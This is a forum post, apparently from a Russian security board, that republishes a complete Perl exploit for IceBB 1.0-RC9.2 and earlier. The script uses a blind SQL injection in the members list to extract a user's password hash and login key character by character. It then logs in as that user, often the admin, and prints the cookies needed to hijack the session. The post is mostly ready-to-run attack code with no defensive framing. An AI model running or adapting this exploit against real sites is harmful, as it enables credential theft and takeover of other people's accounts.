26.07.2008, 22:27
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
IceBB <= 1.0-RC9.2 Blind SQL Injection / Session Hijacking Exploit
IceBB <= 1.0-RC9.2 Blind SQL Injection / Session Hijacking Exploit
Exploit:
Код:
#!/usr/bin/perl
# IceBB <= 1.0-RC9.2 Blind SQL Injection
# Admin/User's Session Hijacking PoC
# Coded by __GiReX__
use LWP::UserAgent;
if(not defined $ARGV[1])
{
banner();
print "[+] Usage:\tperl $0 <host> <path> [id]\n";
print "[+] Example:\tperl $0 localhost /icebb/ 1\n";
exit;
}
my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1];
my $id = (defined $ARGV[2]) ? $ARGV[2]: 1;
my $lwp = new LWP::UserAgent;
my @cset = (48..57, 97..102);
my ($hash, $key, $user, $prefix) = (undef, undef, undef, undef);
banner();
$user = get_username();
$prefix = get_prefix();
print STDOUT "[+] User $id username: $user\n";
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
$rv = check_char($char, $j, "password");
if(defined $rv)
{
$hash .= chr($char);
last;
}
}
last if $j > 2 and not defined $hash;
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: probably fixed\n";
exit;
}
else
{
print STDOUT "\n" x 1;
}
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $key, "loginkey");
$rv = check_char($char, $j, "login_key");
if(defined $rv)
{
$key .= chr($char);
last;
}
}
last if $j > 2 and not defined $key;
}
if(not defined $key or length($key) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: user $id has not a login_key\n";
exit;
}
print "\n\n[+] Attempting to login with user's $id session...\n\n";
$logged = try_login();
if(defined $logged)
{
print STDOUT "[+] Oh yeah logged in!\n\n";
print STDOUT "[+] Try yourself with your browser and these cookies:\n\n";
print STDOUT "[+] Cookie: ${prefix}user=${user}; ${prefix}pass=${hash}; \n".
" ${prefix}uid=${id}; ${prefix}login_key=${key}\n\n";
}
else
{
print STDOUT "[-] Attempt failed...\n\n";
}
print STDOUT "[+] Exploit terminated\n";
sub try_login()
{
my $lwp = new LWP::UserAgent;
$lwp->default_header('Cookie' => "${prefix}user=${user}; ${prefix}pass=${hash}; ${prefix}uid=${id}; ${prefix}login_key=${key}");
my $res = $lwp->get($target);
if($res->is_success)
{
if($res->content =~ /User Control Panel/)
{
return 1;
}
}
return undef;
}
sub info
{
my($c, $cur, $str) = @_;
$cur = '' unless defined $cur;
print STDOUT "[+] User $id ${str}: ${cur}${c}\r";
$| = 1;
}
sub check_char
{
my ($char, $n, $field) = @_ ;
my $res = $lwp->get($target."index.php?act=members&username=%5c&url=".
"OR+ASCII(SUBSTRING((SELECT+${field}+FROM+${prefix}users+WHERE+id=${id}),${n},1))=${char}%23");
if($res->is_success)
{
if($res->content !~ /No members were found that met your selected critera/ and $res->content =~ /<h2>Member list<\/h2>/)
{
return $res->is_success;
}
}
return undef;
}
sub get_prefix()
{
my $rv = "icebb";
my $res = $lwp->get($target."index.php?act=members&username=%5c&url=OR+1");
if($res->content =~ /as total FROM ([a-z]+)_users WHERE/)
{
$rv = $1;
}
return $rv . '_';
}
sub get_username()
{
my $rv = undef;
my $res = $lwp->get($target."index.php?profile=${id}");
if($res->is_success)
{
if($res->content =~ /<h2>View profile: (.+)<\/h2>/)
{
$rv = $1;
}
else
{
die "[-] Exploit mistake: user ${id} does not exists\n";
}
}
else
{
die "[-] Exploit mistake: could not connect to $target\n";
}
return $rv;
}
sub banner
{
print "\n";
print "[+] IceBB <= 1.0-RC9.2 Blind SQL Injection\n";
print "[+] Admin/User's Session Hijacking PoC\n";
print "[+] Coded by __GiReX__\n";
print "\n\n";
}
Original link
|
|
|